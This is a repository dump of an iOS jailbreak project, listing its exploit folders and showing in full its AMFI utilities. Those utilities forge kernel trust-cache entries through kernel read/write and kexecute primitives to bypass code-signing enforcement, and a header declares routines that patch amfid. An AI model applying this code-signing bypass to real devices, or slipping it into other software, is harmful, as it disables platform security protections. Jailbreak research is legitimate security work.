Repository: GeoSn0w/Blizzard-Jailbreak
Branch: master
Commit: db2570f7d3d8
Files: 102
Total size: 832.6 KB
Directory structure:
gitextract_8ln0kc37/
├── .gitignore
├── AMFI Utilities/
│ ├── amfi_utils.h
│ ├── amfi_utils.m
│ ├── amfid.h
│ ├── amfid.m
│ ├── amfid_mem.h
│ ├── amfid_mem.m
│ ├── amfid_tools.h
│ ├── amfid_tools.m
│ ├── cs_blob.h
│ ├── osobject.c
│ └── osobject.h
├── APFS Utilities/
│ ├── IOKit.h
│ ├── liboffsetfinder64.hpp
│ ├── offsetfinder.cpp
│ ├── rootfs_remount.h
│ ├── rootfs_remount.m
│ ├── snapshot_tools.c
│ └── snapshot_tools.h
├── Base Binaries/
│ └── tar
├── Blizzard Jailbreak/
│ ├── AppDelegate.h
│ ├── AppDelegate.m
│ ├── Assets.xcassets/
│ │ ├── AppIcon.appiconset/
│ │ │ └── Contents.json
│ │ ├── Contents.json
│ │ ├── button_mask.imageset/
│ │ │ └── Contents.json
│ │ ├── jailbreak_wallpaper.imageset/
│ │ │ └── Contents.json
│ │ ├── snow.imageset/
│ │ │ └── Contents.json
│ │ └── winter.imageset/
│ │ └── Contents.json
│ ├── Base.lproj/
│ │ ├── LaunchScreen.storyboard
│ │ └── Main.storyboard
│ ├── BlizzardLog.h
│ ├── BlizzardLog.m
│ ├── BlizzardSpawnerTools.c
│ ├── BlizzardSpawnerTools.h
│ ├── Info.plist
│ ├── blizzardJailbreak.h
│ ├── blizzardJailbreak.m
│ ├── blizzardView.h
│ ├── blizzardView.m
│ └── main.m
├── Blizzard Jailbreak.xcodeproj/
│ ├── project.pbxproj
│ ├── project.xcworkspace/
│ │ ├── contents.xcworkspacedata
│ │ ├── xcshareddata/
│ │ │ └── IDEWorkspaceChecks.plist
│ │ └── xcuserdata/
│ │ ├── geosn0w.xcuserdatad/
│ │ │ └── UserInterfaceState.xcuserstate
│ │ ├── jakejames.xcuserdatad/
│ │ │ └── UserInterfaceState.xcuserstate
│ │ └── pwn20wnd.xcuserdatad/
│ │ └── UserInterfaceState.xcuserstate
│ ├── xcshareddata/
│ │ └── xcschemes/
│ │ └── sock_port.xcscheme
│ └── xcuserdata/
│ ├── geosn0w.xcuserdatad/
│ │ └── xcdebugger/
│ │ └── Breakpoints_v2.xcbkptlist
│ ├── jakejames.xcuserdatad/
│ │ ├── xcdebugger/
│ │ │ └── Breakpoints_v2.xcbkptlist
│ │ └── xcschemes/
│ │ └── xcschememanagement.plist
│ └── pwn20wnd.xcuserdatad/
│ └── xcschemes/
│ └── xcschememanagement.plist
├── Exploits/
│ ├── FreeTheSandbox/
│ │ ├── IOTypes.h
│ │ ├── freethesandbox.h
│ │ ├── ios13_change_offsets.m
│ │ ├── ios13_kernel_universal.c
│ │ ├── ios13_userspace.c
│ │ ├── ios13_userspace_pac.c
│ │ ├── ios_7st_utils.m
│ │ ├── libsnappy.c
│ │ ├── libsnappy.h
│ │ ├── vnode.h
│ │ └── xpc.h
│ ├── IOKit/
│ │ ├── IOKitKeys.h
│ │ ├── IOKitLib.h
│ │ ├── IOReturn.h
│ │ └── IOTypes.h
│ └── sock_port/
│ ├── exploit.c
│ ├── exploit.h
│ ├── exploit_utilities.c
│ ├── exploit_utilities.h
│ ├── include/
│ │ └── IOKit/
│ │ ├── IOKitKeys.h
│ │ ├── IOKitLib.h
│ │ ├── IOReturn.h
│ │ ├── IOTypes.h
│ │ └── OSMessageNotification.h
│ ├── iosurface.c
│ ├── iosurface.h
│ ├── kernel_memory.c
│ ├── kernel_memory.h
│ ├── offsetof.c
│ ├── offsetof.h
│ ├── offsets.h
│ └── offsets.m
├── Helper Libraries/
│ ├── libimg4tool.a
│ ├── libmerged.a
│ ├── liboffsetfinder64.a
│ ├── libplist++.a
│ └── libplist.a
├── Kernel Utilities/
│ ├── kernSymbolication.c
│ ├── kernSymbolication.h
│ ├── kernel_utils.h
│ ├── kernel_utils.m
│ ├── kexecute.c
│ ├── kexecute.h
│ ├── lzssdec.cpp
│ ├── lzssdec.hpp
│ └── system_reboot.h
├── LICENSE
├── PatchFinder/
│ ├── patchfinder64.h
│ └── patchfinder64.m
├── README.md
└── Vanity/
└── readme.md
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
.DS_Store
================================================
FILE: AMFI Utilities/amfi_utils.h
================================================
#import <stdio.h>
#import <sys/types.h>
#import "../AMFI Utilities/cs_blob.h"
/* True when the 32-bit word at p is 0xfeedface or 0xfeedfacf: the low bit is
 * masked off before the comparison, so both values match. The word is read
 * in host byte order and p must point at 4 or more readable bytes. */
#define MACHO(p) ((*(unsigned int *)(p) & ~1) == 0xfeedface)
/* One hash entry as written after a struct trust_chain header: 20 bytes.
 * amfi_utils.m copies only the first sizeof(hash_t) bytes of a SHA-256 digest
 * into each entry. */
typedef char hash_t[20];
/* Header placed in front of `count` hash_t entries. Packed, so the layout is
 * exactly 8 + 16 + 4 bytes with no padding. */
struct trust_chain {
    uint64_t next;          /* value read from the existing chain head (see amfi_utils.m) */
    unsigned char uuid[16]; /* filled with arc4random_buf() by the callers in amfi_utils.m */
    unsigned int count;     /* number of hash_t entries that follow the header */
} __attribute__((packed));
/* Returns a calloc'd buffer of `size` bytes read from `file` at `offset`; caller frees. */
void *load_bytes(FILE *file, off_t offset, size_t size);
/* Returns 0 when `str` ends with `tail`, -1 when `tail` is longer, else the memcmp() result. */
int strtail(const char *str, const char *tail);
/* SHA-256 over the CodeDirectory found near the start of `code_dir`; digest written to `out`. */
void getSHA256inplace(const uint8_t* code_dir, uint8_t *out);
/* Same as getSHA256inplace() but returns a malloc'd digest; caller frees. */
uint8_t *getSHA256(const uint8_t* code_dir);
/* Returns a malloc'd copy of the LC_CODE_SIGNATURE data of the file `name`, or NULL. */
uint8_t *getCodeDirectory(const char* name);
/* Kernel-side allocation helpers; both act through kexecute() (see amfi_utils.m). */
uint64_t ubc_cs_blob_allocate(vm_size_t size);
void kern_free(uint64_t addr, vm_size_t size);
/* Calls the kernel routine located by Find_cs_validate_csblob() and returns its result. */
int cs_validate_csblob(const uint8_t *addr, size_t length, CS_CodeDirectory **rcd, CS_GenericBlob **rentitlements);
/* Returns the file offset of the LC_CODE_SIGNATURE load command, or 0; *machOff gets the slice offset. */
uint64_t getCodeSignatureLC(FILE *file, int64_t *machOff);
/* Both functions write a new struct trust_chain plus hashes into kernel memory
 * and link it at the address returned by Find_trustcache(). */
int addBinaryToAMFITrustCache(const char *path);
int amfiTrustHash(hash_t hash);
/* Reads an 8-byte table slot, indexed by (type - 1), from kernel memory. */
const struct cs_hash *cs_find_md(uint8_t type);
================================================
FILE: AMFI Utilities/amfi_utils.m
================================================
// Comes from Electra, adapted for FAT binary support by Jake James
//
// amfi_utils.c
// electra
//
// Created by Jamie on 27/01/2018.
// Copyright © 2018 Electra Team. All rights reserved.
//
#include "amfi_utils.h"
#include "kernel_utils.h"
#include "patchfinder64.h"
#include <stdlib.h>
#include <mach-o/loader.h>
#include <mach-o/fat.h>
#include <CommonCrypto/CommonDigest.h>
#include <Foundation/Foundation.h>
#include "../Kernel Utilities/kexecute.h"
#include "../Kernel Utilities/kernel_utils.h"
#include "../Exploits/sock_port/kernel_memory.h"
#include <sys/mman.h>
/* Reverse the byte order of a 32-bit value (big-endian <-> little-endian). */
uint32_t swap_uint32( uint32_t val ) {
    const uint32_t lowest  = (val & 0x000000FFu) << 24;
    const uint32_t low_mid = (val & 0x0000FF00u) << 8;
    const uint32_t high_mid = (val >> 8) & 0x0000FF00u;
    const uint32_t highest = val >> 24;
    return lowest | low_mid | high_mid | highest;
}
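/*
 * Read the 32-bit magic stored at `offset` in `file`, in host byte order.
 *
 * Returns 0 when `file` is NULL, the seek fails, or fewer than four bytes are
 * available. The original returned an uninitialized stack value in those
 * cases, which could compare equal to a valid magic by accident; 0 matches
 * none of the magics the callers test for.
 */
uint32_t read_magic(FILE* file, off_t offset) {
    uint32_t magic = 0;
    if (file == NULL || fseek(file, offset, SEEK_SET) != 0) {
        return 0;
    }
    if (fread(&magic, sizeof(magic), 1, file) != 1) {
        /* A partial read may have filled some bytes; do not hand them back. */
        return 0;
    }
    return magic;
}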
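/*
 * Return a freshly allocated, zero-initialized buffer holding `size` bytes
 * read from `file` starting at `offset`. The caller owns the buffer and must
 * free() it.
 *
 * Returns NULL when `file` is NULL or the allocation fails. If the seek fails
 * nothing is read, and on a short read the unread remainder stays zero, so a
 * truncated file never exposes stale heap contents to the header parsers that
 * call this.
 */
void *load_bytes(FILE *file, off_t offset, size_t size) {
    if (file == NULL) {
        return NULL;
    }
    void *buf = calloc(1, size);
    if (buf == NULL) {
        return NULL;
    }
    if (fseek(file, offset, SEEK_SET) == 0) {
        /* Result deliberately ignored: a short read leaves zero bytes behind. */
        (void)fread(buf, size, 1, file);
    }
    return buf;
}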
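/*
 * Compute SHA-256 over the CodeDirectory blob located within the first ten
 * 32-bit words of `code_dir` and store the digest in `out`, which must hold
 * CC_SHA256_DIGEST_LENGTH bytes.
 *
 * The scan looks for the big-endian magic 0xfade0c02 and takes the following
 * word as the blob length. The original kept scanning after a hit, so a
 * second occurrence of the magic advanced the start pointer a second time
 * while the length came from a different position; the scan now stops at the
 * first hit. If no magic is found the digest of zero bytes is produced, as
 * before.
 *
 * NOTE(review): the caller passes no buffer size, so the 44 bytes examined by
 * the scan and the embedded length are both trusted as-is. Input from a file
 * that is not known-good should be length-checked before it gets here.
 */
void getSHA256inplace(const uint8_t* code_dir, uint8_t *out) {
    if (code_dir == NULL) {
        printf("AMFI TOOLS: NULL passed to getSHA256inplace!\n");
        return;
    }
    const uint32_t *words = (const uint32_t *)code_dir;
    uint32_t realsize = 0;
    for (int j = 0; j < 10; j++) {
        if (swap_uint32(words[j]) == 0xfade0c02) {
            realsize = swap_uint32(words[j + 1]);
            code_dir += 4 * j;
            break;
        }
    }
    CC_SHA256(code_dir, realsize, out);
}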
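/*
 * Allocate a CC_SHA256_DIGEST_LENGTH-byte buffer and fill it through
 * getSHA256inplace(). The caller frees the result.
 *
 * Returns NULL if the allocation fails. The buffer is zero-initialized
 * because getSHA256inplace() returns without writing when `code_dir` is NULL;
 * with malloc() the caller received uninitialized heap bytes in that case.
 */
uint8_t *getSHA256(const uint8_t* code_dir) {
    uint8_t *out = calloc(1, CC_SHA256_DIGEST_LENGTH);
    if (out == NULL) {
        return NULL;
    }
    getSHA256inplace(code_dir, out);
    return out;
}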
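/*
 * Return a malloc'd copy of the code-signature data referenced by the
 * LC_CODE_SIGNATURE load command of the Mach-O file `name`, or NULL when the
 * file cannot be opened, is not a 64-bit or FAT Mach-O, has no such command,
 * or is truncated. The caller frees the result.
 *
 * For FAT files the first slice whose magic is 0xFEEDFACF is used; the log
 * text calls this "arm64" although only the magic is tested, not the CPU type.
 *
 * Changes from the original: fopen() failure is handled instead of
 * dereferencing NULL, the temporary header buffers are freed, every header
 * read is checked, a load command with cmdsize smaller than its own header
 * stops the walk, and a zero-sized or short-read signature is rejected rather
 * than returned partly uninitialized.
 *
 * NOTE(review): the returned buffer carries no length. Consumers such as
 * parse_superblob() trust the lengths and offsets embedded in the blob, so a
 * crafted file can still drive out-of-bounds reads downstream.
 */
uint8_t *getCodeDirectory(const char* name) {
    FILE* fd = fopen(name, "r");
    if (fd == NULL) {
        printf("AMFI TOOLS: Unable to open %s\n", name);
        return NULL;
    }
    uint8_t *cd = NULL;
    uint32_t magic = 0;
    // A short read leaves magic at 0, which falls into the "not a macho" branch.
    fread(&magic, sizeof(magic), 1, fd);
    fseek(fd, 0, SEEK_SET);
    long off = 0, file_off = 0;
    int ncmds = 0;
    BOOL foundarm64 = false;
    if (magic == MH_MAGIC_64) {
        struct mach_header_64 mh64;
        if (fread(&mh64, sizeof(mh64), 1, fd) != 1) {
            goto out;
        }
        off = sizeof(mh64);
        ncmds = mh64.ncmds;
    }
    else if (magic == MH_MAGIC) {
        printf("AMFI TOOLS: %s is 32bit. What are you doing here?\n", name);
        goto out;
    }
    else if (magic == 0xBEBAFECA) {
        size_t header_size = sizeof(struct fat_header);
        size_t arch_size = sizeof(struct fat_arch);
        size_t arch_off = header_size;
        struct fat_header *fat = (struct fat_header*)load_bytes(fd, 0, header_size);
        if (fat == NULL) {
            goto out;
        }
        int n = swap_uint32(fat->nfat_arch);
        free(fat);
        printf("AMFI TOOLS: Binary is FAT with %d architectures\n", n);
        while (n-- > 0) {
            struct fat_arch *arch = (struct fat_arch *)load_bytes(fd, arch_off, arch_size);
            if (arch == NULL) {
                break;
            }
            uint32_t slice_off = swap_uint32(arch->offset);
            free(arch);
            magic = read_magic(fd, slice_off);
            if (magic == 0xFEEDFACF) {
                struct mach_header_64* mh64 = (struct mach_header_64*)load_bytes(fd, slice_off, sizeof(struct mach_header_64));
                if (mh64 == NULL) {
                    break;
                }
                printf("AMFI TOOLS: Found arm64\n");
                foundarm64 = true;
                file_off = slice_off;
                off = slice_off + sizeof(struct mach_header_64);
                ncmds = mh64->ncmds;
                free(mh64);
                break;
            }
            arch_off += arch_size;
        }
        if (!foundarm64) {
            printf("AMFI TOOLS: No arm64? RIP\n");
            goto out;
        }
    }
    else {
        printf("AMFI TOOLS: %s is not a macho! (or has foreign endianness?) (magic: %x)\n", name, magic);
        goto out;
    }
    for (int i = 0; i < ncmds; i++) {
        struct load_command cmd;
        if (fseek(fd, off, SEEK_SET) != 0 || fread(&cmd, sizeof(struct load_command), 1, fd) != 1) {
            break;
        }
        if (cmd.cmd == LC_CODE_SIGNATURE) {
            // The two words after the load_command header are the data offset and size.
            uint32_t off_cs = 0;
            uint32_t size_cs = 0;
            if (fread(&off_cs, sizeof(uint32_t), 1, fd) != 1 ||
                fread(&size_cs, sizeof(uint32_t), 1, fd) != 1 ||
                size_cs == 0) {
                break;
            }
            cd = malloc(size_cs);
            if (cd == NULL) {
                break;
            }
            if (fseek(fd, off_cs + file_off, SEEK_SET) != 0 || fread(cd, size_cs, 1, fd) != 1) {
                // Truncated file: do not return a partly filled buffer.
                free(cd);
                cd = NULL;
            }
            break;
        }
        if (cmd.cmdsize < sizeof(struct load_command)) {
            // Malformed command; advancing by it would re-read the same bytes.
            break;
        }
        off += cmd.cmdsize;
    }
out:
    fclose(fd);
    return cd;
}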
//from xerub
/*
 * Suffix test: returns 0 when `str` ends with `tail`, -1 when `tail` is longer
 * than `str`, and otherwise the non-zero memcmp() result for the last
 * strlen(tail) bytes of `str`. Both arguments must be non-NULL C strings.
 */
int strtail(const char *str, const char *tail)
{
    const size_t str_len = strlen(str);
    const size_t tail_len = strlen(tail);
    /* A suffix longer than the string itself can never match. */
    return (tail_len > str_len)
        ? -1
        : memcmp(str + (str_len - tail_len), tail, tail_len);
}
/*
 * Call the kernel routine located by Find_cs_validate_csblob() through
 * kexecute() and return its result, truncated to int.
 *
 * addr, length    passed to the kernel routine unchanged
 * rcd             receives the 8-byte value the routine stored in its third argument
 * rentitlements   receives the 8-byte value stored in its fourth argument
 *
 * NOTE(review): the values written to *rcd and *rentitlements are read from
 * kernel memory with rk64(); presumably they are kernel addresses and cannot
 * be dereferenced directly by the caller. Confirm against the call sites.
 */
int cs_validate_csblob(const uint8_t *addr, size_t length, CS_CodeDirectory **rcd, CS_GenericBlob **rentitlements) {
    // Two 8-byte kernel allocations that act as the routine's out-parameters.
    // NOTE(review): neither kalloc() result nor the Find_cs_validate_csblob()
    // address is checked before use.
    uint64_t rcdptr = kalloc(sizeof(uint64_t));
    uint64_t entptr = kalloc(sizeof(uint64_t));
    int ret = (int)kexecute(Find_cs_validate_csblob(), (uint64_t)addr, length, rcdptr, entptr, 0, 0, 0);
    // The out-parameters are copied back even when ret reports failure.
    *rcd = (CS_CodeDirectory *)rk64(rcdptr);
    *rentitlements = (CS_GenericBlob *)rk64(entptr);
    kfree(rcdptr, sizeof(uint64_t));
    kfree(entptr, sizeof(uint64_t));
    return ret;
}
/*
 * Allocate `size` bytes of kernel memory by calling kernel allocators through
 * kexecute(). Returns the kernel address, or 0 when a lookup or allocation
 * step fails.
 *
 * Sizes up to 0x1ff8 go through the routine found by Find_kalloc_canblock();
 * larger sizes are rounded up to a multiple of 0x4000 and go through the
 * routine found by Find_kernel_memory_allocate().
 */
uint64_t ubc_cs_blob_allocate(vm_size_t size) {
    if (size <= 0x1ff8) {
        // The allocator takes a pointer to the size, so the size is staged in a kernel slot first.
        uint64_t size_p = kalloc(sizeof(vm_size_t));
        if (!size_p) return 0;
        kwrite(size_p, &size, sizeof(vm_size_t));
        // NOTE(review): each early return below leaks the size_p slot.
        uint64_t kall = Find_kalloc_canblock();
        if (!kall) return 0;
        uint64_t site = Find_cs_blob_allocate_site();
        if (!site) return 0;
        uint64_t alloced = kexecute(kall, size_p, 1, site, 0, 0, 0, 0);
        if (!alloced) return 0;
        kfree(size_p, sizeof(vm_size_t));
        // The raw return value is passed through ZmFixAddr() before it is returned.
        alloced = ZmFixAddr(alloced);
        return alloced;
    }
    else {
        // Round up to the next 0x4000 boundary.
        size = (size + 0x3fff) & ~0x3fff;
        // Kernel slot that receives the address of the new allocation.
        uint64_t addrp = kalloc(sizeof(uint64_t));
        if (!addrp) return 0;
        // NOTE(review): the early returns below leak the addrp slot.
        uint64_t kernel_map = Find_kernel_map();
        if (!kernel_map) return 0;
        kernel_map = rk64(kernel_map);
        if (!kernel_map) return 0;
        uint64_t alloc = Find_kernel_memory_allocate();
        if (!alloc) return 0;
        // NOTE(review): the kexecute() result is not checked, and the literals
        // 4 and 17 are passed without named constants; confirm their meaning.
        kexecute(alloc, kernel_map, addrp, size, 0, 4, 17, 0);
        // addrp is overwritten with the value it pointed to, so the 8-byte
        // slot itself is never released with kfree().
        addrp = rk64(addrp);
        return addrp;
    }
}
/*
 * Release a kernel allocation by calling the routine found by Find_kfree()
 * through kexecute(). Sizes above 0x1ff8 are rounded up to a multiple of
 * 0x4000 first, the same rounding ubc_cs_blob_allocate() applies to them.
 */
void kern_free(uint64_t addr, vm_size_t size) {
    vm_size_t release_size = size;
    if (release_size > 0x1ff8) {
        release_size = (release_size + 0x3fff) & ~0x3fff;
    }
    kexecute(Find_kfree(), addr, release_size, 0, 0, 0, 0, 0);
}
/*
 * Read one 8-byte entry from the table at the address returned by
 * Find_cs_find_md(), using (type - 1) as the index, and return it as a
 * pointer to struct cs_hash.
 *
 * NOTE(review): `type` is not range-checked; 0 yields an offset of -8, and
 * any value selects whatever lies at that slot.
 */
const struct cs_hash *cs_find_md(uint8_t type) {
    const uint64_t table = Find_cs_find_md();
    const uint64_t slot = table + ((type - 1) * 8);
    return (struct cs_hash *)rk64(slot);
}
/*
 * Locate the LC_CODE_SIGNATURE load command in an open Mach-O file.
 *
 * Returns the file offset of the load command, or 0 when the file is neither
 * a 64-bit (0xFEEDFACF) nor a FAT (0xBEBAFECA) Mach-O, when a FAT file has no
 * slice with cputype 0x100000c, or when no such command exists.
 * *machOff is set to -1 first and then, once a slice is chosen, to the offset
 * of that slice within the file (0 for a thin file).
 *
 * NOTE(review): load_bytes() results are dereferenced unchecked, and ncmds
 * and cmdsize come straight from the file.
 */
uint64_t getCodeSignatureLC(FILE *file, int64_t *machOff) {
    size_t cursor = 0;
    *machOff = -1;

    uint32_t *magic_buf = load_bytes(file, cursor, sizeof(uint32_t));
    const uint32_t magic = *magic_buf;
    free(magic_buf);

    const bool is_fat = (magic == 0xBEBAFECA);
    if (!is_fat && magic != 0xFEEDFACF) {
        printf("AMFI TOOLS: File is not an arm64 or FAT macho!\n");
        return 0;
    }

    if (is_fat) {
        struct fat_header *fat = (struct fat_header*)load_bytes(file, 0, sizeof(struct fat_header));
        int remaining = ntohl(fat->nfat_arch);
        free(fat);
        printf("AMFI TOOLS: Binary is FAT with %d architectures\n", remaining);

        bool have_arm64 = false;
        uint32_t arch_off = sizeof(struct fat_header);
        for (; remaining > 0; remaining--, arch_off += sizeof(struct fat_arch)) {
            struct fat_arch *arch = (struct fat_arch *)load_bytes(file, arch_off, sizeof(struct fat_arch));
            const bool is_arm64 = (ntohl(arch->cputype) == 0x100000c);
            if (is_arm64) {
                cursor = ntohl(arch->offset);
            }
            free(arch);
            if (is_arm64) {
                printf("AMFI TOOLS: Found arm64\n");
                have_arm64 = true;
                break;
            }
        }
        if (!have_arm64) {
            printf("AMFI TOOLS: Binary does not have any arm64 slice\n");
            return 0;
        }
    }

    *machOff = cursor;

    struct mach_header_64 *header = load_bytes(file, cursor, sizeof(struct mach_header_64));
    const int ncmds = header->ncmds;
    free(header);
    cursor += sizeof(struct mach_header_64);

    /* Walk the load commands that follow the header. */
    int i = 0;
    while (i < ncmds) {
        struct load_command *lc = load_bytes(file, cursor, sizeof(struct load_command));
        const uint32_t kind = lc->cmd;
        const uint32_t step = lc->cmdsize;
        free(lc);
        if (kind == LC_CODE_SIGNATURE) {
            return cursor;
        }
        cursor += step;
        i++;
    }
    return 0;
}
/*
 * Collect the Mach-O files at `path` (one file, or every file under a
 * directory), hash each file's code signature data, and write a new
 * struct trust_chain followed by those hashes into kernel memory, linked at
 * the address returned by Find_trustcache().
 *
 * Returns 0 after the kernel write, -1 when the path does not exist, -2 when
 * a directory holds no accepted file, and 2..7 for the single-file checks
 * (extension, lstat/size, open, read, magic, mmap).
 *
 * What the kernel-side effect looks like from the visible code: the new entry
 * lives in kalloc'd memory, carries a random UUID, and its `next` field holds
 * the previous head value, so the pre-existing chain stays reachable behind it.
 */
int addBinaryToAMFITrustCache(const char *path) {
    NSMutableArray *paths = [NSMutableArray array];
    NSFileManager *fileManager = [NSFileManager defaultManager];
    BOOL isDir = NO;
    if (![fileManager fileExistsAtPath:@(path) isDirectory:&isDir]) {
        printf("AMFI TRUST: Path does not exist!\n");
        return -1;
    }
    NSURL *directoryURL = [NSURL URLWithString:@(path)];
    NSArray *keys = [NSArray arrayWithObject:NSURLIsDirectoryKey];
    if (isDir) {
        // Directory: walk it and keep every regular file that passes the checks below.
        NSDirectoryEnumerator *enumerator = [fileManager
                                             enumeratorAtURL:directoryURL
                                             includingPropertiesForKeys:keys
                                             options:0
                                             errorHandler:^(NSURL *url, NSError *error) {
            if (error) printf("AMFI TRUST: %s\n", [[error localizedDescription] UTF8String]);
            return YES;
        }];
        for (NSURL *url in enumerator) {
            NSError *error;
            NSNumber *isDirectory = nil;
            if (![url getResourceValue:&isDirectory forKey:NSURLIsDirectoryKey error:&error]) {
                if (error) continue;
            }
            else if (![isDirectory boolValue]) {
                int rv;
                int fd;
                uint8_t *p;
                off_t sz;
                struct stat st;
                uint8_t buf[16];
                // NOTE(review): every `continue` below leaks this strdup'd copy.
                char *fpath = strdup([[url path] UTF8String]);
                // Skip obvious resource files by extension.
                if (strtail(fpath, ".plist") == 0 || strtail(fpath, ".nib") == 0 || strtail(fpath, ".strings") == 0 || strtail(fpath, ".png") == 0) {
                    continue;
                }
                // lstat() does not follow symlinks; only regular files of at least 0x4000 bytes pass.
                rv = lstat(fpath, &st);
                if (rv || !S_ISREG(st.st_mode) || st.st_size < 0x4000) {
                    continue;
                }
                fd = open(fpath, O_RDONLY);
                if (fd < 0) {
                    continue;
                }
                sz = read(fd, buf, sizeof(buf));
                if (sz != sizeof(buf)) {
                    close(fd);
                    continue;
                }
                // Accept FAT (0xBEBAFECA as read in host order) or a thin Mach-O magic.
                if (*(uint32_t *)buf != 0xBEBAFECA && !MACHO(buf)) {
                    close(fd);
                    continue;
                }
                // The mapping only proves the file can be mapped; `p` is never read.
                // NOTE(review): on success neither the mapping nor fd is released.
                p = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
                if (p == MAP_FAILED) {
                    close(fd);
                    continue;
                }
                [paths addObject:@(fpath)];
                printf("AMFI TRUST: ADDING TO TRUST CACHE %s\n", fpath);
                free(fpath);
            }
        }
        if ([paths count] == 0) {
            printf("AMFI TRUST: No files in %s passed the integrity checks!\n", path);
            return -2;
        }
    }
    else {
        // Single file: same checks as above, but each failure returns a distinct code.
        printf("AMFI TRUST: ADDING TO TRUST CACHE %s\n", path);
        [paths addObject:@(path)];
        int rv;
        int fd;
        uint8_t *p;
        off_t sz;
        struct stat st;
        uint8_t buf[16];
        if (strtail(path, ".plist") == 0 || strtail(path, ".nib") == 0 || strtail(path, ".strings") == 0 || strtail(path, ".png") == 0) {
            printf("AMFI TRUST Binary not an executable! Kernel doesn't like trusting data, geez\n");
            return 2;
        }
        rv = lstat(path, &st);
        // NOTE(review): the message says "too big", but this branch is taken when
        // lstat() fails, the path is not a regular file, or the file is SMALLER
        // than 0x4000 bytes.
        if (rv || !S_ISREG(st.st_mode) || st.st_size < 0x4000) {
            printf("AMFI TRUST Binary too big\n");
            return 3;
        }
        fd = open(path, O_RDONLY);
        if (fd < 0) {
            printf("AMFI TRUST Don't have permission to open file\n");
            return 4;
        }
        sz = read(fd, buf, sizeof(buf));
        if (sz != sizeof(buf)) {
            close(fd);
            printf("AMFI TRUST Failed to read from binary\n");
            return 5;
        }
        if (*(uint32_t *)buf != 0xBEBAFECA && !MACHO(buf)) {
            close(fd);
            printf("AMFI TRUST Binary not a macho!\n");
            return 6;
        }
        // NOTE(review): as in the directory branch, the mapping and fd stay open on success.
        p = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
        if (p == MAP_FAILED) {
            close(fd);
            printf("AMFI TRUST Failed to mmap file\n");
            return 7;
        }
    }
    // NOTE(review): the Find_trustcache() result is used without a zero check.
    uint64_t trust_chain = Find_trustcache();
    printf("AMFI TRUST trust_chain at 0x%llx\n", trust_chain);
    struct trust_chain fake_chain;
    // Link the new entry in front of whatever the head currently points to.
    fake_chain.next = rk64(trust_chain);
    arc4random_buf(fake_chain.uuid, 16);
    int cnt = 0;
    uint8_t hash[CC_SHA256_DIGEST_LENGTH];
    // NOTE(review): malloc() result is not checked.
    hash_t *allhash = malloc(sizeof(hash_t) * [paths count]);
    for (int i = 0; i != [paths count]; ++i) {
        // NOTE(review): the buffer returned by getCodeDirectory() is never freed.
        uint8_t *cd = getCodeDirectory((char*)[[paths objectAtIndex:i] UTF8String]);
        if (cd != NULL) {
            getSHA256inplace(cd, hash);
            // Only the first sizeof(hash_t) (20) bytes of the 32-byte digest are kept.
            memmove(allhash[cnt], hash, sizeof(hash_t));
            ++cnt;
        }
        else {
            printf("AMFI TRUST CD NULL\n");
            continue;
        }
    }
    fake_chain.count = cnt;
    // Header plus hashes, rounded up to a multiple of 0x4000.
    size_t length = (sizeof(fake_chain) + cnt * sizeof(hash_t) + 0x3FFF) & ~0x3FFF;
    // NOTE(review): the kalloc() result is not checked before the writes below.
    uint64_t kernel_trust = kalloc(length);
    printf("AMFI TRUST allocated: 0x%zx => 0x%llx\n", length, kernel_trust);
    kwrite(kernel_trust, &fake_chain, sizeof(fake_chain));
    kwrite(kernel_trust + sizeof(fake_chain), allhash, cnt * sizeof(hash_t));
#if __arm64e__
    // arm64e builds hand the buffer to the routine found by Find_pmap_load_trust_cache_ppl().
    // NOTE(review): amfiTrustHash() calls kexecute() here; this function calls Kernel_Execute().
    Kernel_Execute(Find_pmap_load_trust_cache_ppl(), kernel_trust, length, 0, 0, 0, 0, 0);
#else
    // Other builds overwrite the 8-byte head pointer directly.
    wk64(trust_chain, kernel_trust);
#endif
    free(allhash);
    return 0;
}
/*
 * Single-hash variant of addBinaryToAMFITrustCache(): builds a
 * struct trust_chain with count == 1, writes it and the caller-supplied
 * 20-byte `hash` into a kalloc'd kernel buffer, and links that buffer at the
 * address returned by Find_trustcache(). Always returns 0.
 *
 * NOTE(review): the Find_trustcache() and kalloc() results are not checked,
 * so a failed lookup or allocation is not reported to the caller.
 */
int amfiTrustHash(hash_t hash) {
    uint64_t trust_chain = Find_trustcache();
    printf("AMFI TRUST trust_chain at 0x%llx\n", trust_chain);
    struct trust_chain fake_chain;
    // The new entry points at the previous head, keeping the existing chain reachable.
    fake_chain.next = rk64(trust_chain);
    arc4random_buf(fake_chain.uuid, 16);
    fake_chain.count = 1;
    // Header plus one hash, rounded up to a multiple of 0x4000.
    size_t length = (sizeof(fake_chain) + sizeof(hash_t) + 0x3FFF) & ~0x3FFF;
    uint64_t kernel_trust = kalloc(length);
    printf("AMFI TRUST allocated: 0x%zx => 0x%llx\n", length, kernel_trust);
    kwrite(kernel_trust, &fake_chain, sizeof(fake_chain));
    kwrite(kernel_trust + sizeof(fake_chain), hash, sizeof(hash_t));
#if __arm64e__
    // arm64e builds call the routine found by Find_pmap_load_trust_cache_ppl().
    kexecute(Find_pmap_load_trust_cache_ppl(), kernel_trust, length, 0, 0, 0, 0, 0);
#else
    // Other builds overwrite the 8-byte head pointer directly.
    wk64(trust_chain, kernel_trust);
#endif
    return 0;
}
================================================
FILE: AMFI Utilities/amfid.h
================================================
#import <dlfcn.h>
#import <stdio.h>
#import <unistd.h>
#import <sys/types.h>
#import <mach/mach.h>
#import <mach-o/loader.h>
#import <mach/error.h>
#import <errno.h>
#import <stdlib.h>
#import <sys/sysctl.h>
#import <dlfcn.h>
#import <sys/mman.h>
#import <spawn.h>
#import <sys/stat.h>
#import <pthread.h>
#import <signal.h>
#import <mach/thread_state.h>
#import <mach/thread_status.h>
#import <mach/thread_info.h>
/* Thread entry point that services exception messages received on the port
 * created by setAmfidExceptionHandler(); defined in amfid.m. */
void* AMFIDExceptionHandler(void* arg);
/* Registers a new exception port on the given task and starts `exceptionHandler`
 * on its own pthread. Returns 0 on success, 1 on failure. */
int setAmfidExceptionHandler(mach_port_t amfid_task_port, void *(exceptionHandler)(void*));
/* Returns the original value of the patched import slot; the error paths
 * `return -1` from this unsigned function. */
uint64_t patchAMFID(void);
/* Message layouts are packed to 4 bytes so they match what mach_msg() delivers. */
#pragma pack(4)
/* Leading part of an exception-raise request: header, body, then the thread
 * and task port descriptors and the NDR record. */
